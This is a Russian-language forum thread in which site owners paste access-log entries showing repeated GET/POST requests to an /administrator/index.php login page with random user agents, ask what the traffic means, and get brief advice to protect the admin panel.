130.185.105.141 - - [03/May/2013:23:05:27 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "h2RhH1ZsPwi3"

130.185.105.141 - - [03/May/2013:23:08:14 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "4w 6Iw9 4K RMhE31FQ"
130.185.105.141 - - [03/May/2013:23:08:15 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "4w 6Iw9 4K RMhE31FQ"

130.185.105.141 - - [03/May/2013:23:11:09 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "7MswelAmZjwc"
130.185.105.141 - - [03/May/2013:23:11:10 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "7MswelAmZjwc"

Вот такие логи..


130.185.105.141 - - [03/May/2013:23:05:27 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "h2RhH1ZsPwi3"
130.185.105.141 - - [03/May/2013:23:05:27 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "h2RhH1ZsPwi3"

130.185.105.141 - - [03/May/2013:23:08:14 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "4w 6Iw9 4K RMhE31FQ"
130.185.105.141 - - [03/May/2013:23:08:15 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "4w 6Iw9 4K RMhE31FQ"

130.185.105.141 - - [03/May/2013:23:11:09 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "7MswelAmZjwc"
130.185.105.141 - - [03/May/2013:23:11:10 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "7MswelAmZjwc"

поставьте дополнительную защиту на админку и все дела

Вот таким вот макаром перебираются картинки и CSS сайта
Что это?

Что скажите господа?

Ребята что это?

Ребята что это?

иньекции

Ребята сегодня получил лог
куда копать ?